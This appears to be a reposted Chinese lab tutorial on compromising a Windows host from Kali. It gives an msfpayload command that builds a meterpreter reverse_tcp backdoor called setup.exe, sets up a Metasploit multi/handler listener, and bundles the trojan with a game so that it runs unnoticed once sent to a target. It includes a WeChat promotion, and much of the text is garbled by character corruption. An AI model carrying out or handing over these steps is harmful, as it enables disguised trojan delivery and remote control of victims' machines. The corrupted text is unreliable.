這個(gè)實(shí)驗(yàn)主要讓我們學(xué)習(xí)漏洞掃描技術(shù)基本原理,了解其在網(wǎng)絡(luò)攻防中的作用,掌握使用Kali中的Metasploit對(duì)目標(biāo)主機(jī)滲透,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施。
本次實(shí)戰(zhàn)環(huán)境:Kali滲透Windows服務(wù)器
實(shí)戰(zhàn)步驟一
本實(shí)驗(yàn)通過(guò)利用kali進(jìn)行漏洞掃描,使用Metasploit對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試,并根據(jù)報(bào)告做出相應(yīng)的防護(hù)措施,共分為3個(gè)實(shí)驗(yàn)步驟,詳情如下;
1、 實(shí)戰(zhàn)步驟一:生成setup.exe后門程序,即木馬程序。
(1) 打開kali終端,輸入ifconfig, 得到本機(jī)ip為192.168.189.130。
如下圖:
(2)輸入以下命令,使用msfpayload生成名為setup的后門程序:
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.189.130 x > setup.exe 如下圖:
(3) 進(jìn)入setup.exe所在目錄,修改屬性:選擇“允許以程序執(zhí)行文件”。
如下圖所示:
(4) 終端中輸入首先msfconsole;然后輸入use exploit/multi/handler來(lái)加載 exploit/multi/handler 模塊;輸入set LHOST 192.168.189.130來(lái)設(shè)置本地主機(jī);然后輸入exploit -z -j開始監(jiān)聽(tīng),如下圖所示:
實(shí)戰(zhàn)步驟二
將上面生成的木馬程序與某個(gè)軟件進(jìn)行捆綁。
【----幫助網(wǎng)安學(xué)習(xí),以下所有學(xué)習(xí)資料免費(fèi)領(lǐng)!加vx:yj009991,備注 “博客園” 獲??!】
?、?網(wǎng)安學(xué)習(xí)成長(zhǎng)路徑思維導(dǎo)圖
?、?60+網(wǎng)安經(jīng)典常用工具包
?、?100+SRC漏洞分析報(bào)告
?、?150+網(wǎng)安攻防實(shí)戰(zhàn)技術(shù)電子書
?、?最權(quán)威CISSP 認(rèn)證考試指南+題庫(kù)
?、?超1800頁(yè)CTF實(shí)戰(zhàn)技巧手冊(cè)
?、?最新網(wǎng)安大廠面試題合集(含答案)
?、?APP客戶端安全檢測(cè)指南(安卓+IOS)
(1)可以在windows系統(tǒng)下使用exe捆綁軟件將setup.exe和一個(gè)其他的某個(gè)安全軟件合并為一個(gè)軟件,這樣在運(yùn)行軟件時(shí)兩個(gè)軟件同時(shí)運(yùn)行,不會(huì)引起注意。在tools里面進(jìn)入名為exekunbang的文件,先打開ExeBinder.exe捆綁軟件。選擇第一個(gè)要合并的軟件,默認(rèn)選擇本軟件中自帶的小游戲程序:
點(diǎn)擊下一步,選擇第二個(gè)要捆綁的軟件,即之前生成的木馬程序setup.exe:
點(diǎn)擊下一步,選擇一個(gè)文件要保存的路徑:
繼續(xù)點(diǎn)擊下一步,開始捆綁軟件:
(2) 將捆綁后的軟件發(fā)送給目標(biāo)主機(jī)。
實(shí)戰(zhàn)步驟三
檢測(cè)目標(biāo)主機(jī),對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試。
(2) 目標(biāo)主機(jī)執(zhí)行程序后,在kali終端中的檢測(cè)程序會(huì)及時(shí)檢測(cè)到。在檢測(cè)到目標(biāo)主機(jī)運(yùn)行程序后,后門程序會(huì)反向連接到msf,之后msf發(fā)起第二次攻擊(開始滲透),然后客戶端(后門程序)連接到服務(wù)端(msf)。輸入sessionss:
可以看到目標(biāo)主機(jī)的ip為192.168.189.129,
(2)再繼續(xù)輸入sessions -i 1,之后可以對(duì)目標(biāo)主機(jī)進(jìn)行一系列的操作。如輸入sysinfo可知道目標(biāo)主機(jī)的系統(tǒng)信息;輸入 getuid查看對(duì)方正在運(yùn)行的用戶。
要養(yǎng)成多思考多總結(jié)的習(xí)慣,對(duì)實(shí)驗(yàn)結(jié)果多去分析,這樣回收獲更多。比如如何利用kali進(jìn)行漏洞掃描;如何使用Metasploit對(duì)目標(biāo)主機(jī)進(jìn)行滲透測(cè)試;這些都是這次實(shí)戰(zhàn)后可以去思考的。
更多網(wǎng)安技能的在線實(shí)操練習(xí),請(qǐng)點(diǎn)擊這里>>文章來(lái)源:http://www.zghlxwxcb.cn/news/detail-464709.html
?文章來(lái)源地址http://www.zghlxwxcb.cn/news/detail-464709.html
到了這里,關(guān)于Kali滲透Windows服務(wù)器的文章就介紹完了。如果您還想了解更多內(nèi)容,請(qǐng)?jiān)谟疑辖撬阉鱐OY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!